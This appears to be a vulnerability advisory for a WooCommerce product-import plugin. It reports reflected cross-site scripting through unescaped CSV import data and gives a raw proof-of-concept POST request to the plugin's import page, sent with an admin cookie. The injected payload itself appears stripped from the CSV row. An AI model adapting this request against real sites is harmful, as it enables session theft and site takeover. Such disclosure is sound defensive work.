The plugin does not sanitise and escape the imported data before outputting it back in the page, leading to a Reflected Cross-Site Scripting
POST /wp-admin/admin.php?page=woo_pi&tab;=import HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------26500037853062016269678995697 Content-Length: 1234 Connection: close Cookie: [logged in admin] Upgrade-Insecure-Requests: 1 -----------------------------26500037853062016269678995697 Content-Disposition: form-data; name=“upload_method” upload -----------------------------26500037853062016269678995697 Content-Disposition: form-data; name=“csv_file”; filename=“a.csv” Content-Type: text/csv Name,Content,Price,Gender,sku,Multi_cat,Thumbnail Pumpkin spice cupcake, Pumpkin spice cupcake 3",5.99, Bakery,128,Dessert, -----------------------------26500037853062016269678995697 Content-Disposition: form-data; name=“csv_file_ftp[passive]” auto -----------------------------26500037853062016269678995697 Content-Disposition: form-data; name=“delimiter” , -----------------------------26500037853062016269678995697 Content-Disposition: form-data; name=“category_separator” | -----------------------------26500037853062016269678995697 Content-Disposition: form-data; name=“parent_child_delimiter” > -----------------------------26500037853062016269678995697 Content-Disposition: form-data; name=“action” upload -----------------------------26500037853062016269678995697 Content-Disposition: form-data; name=“page_options” csv_file -----------------------------26500037853062016269678995697–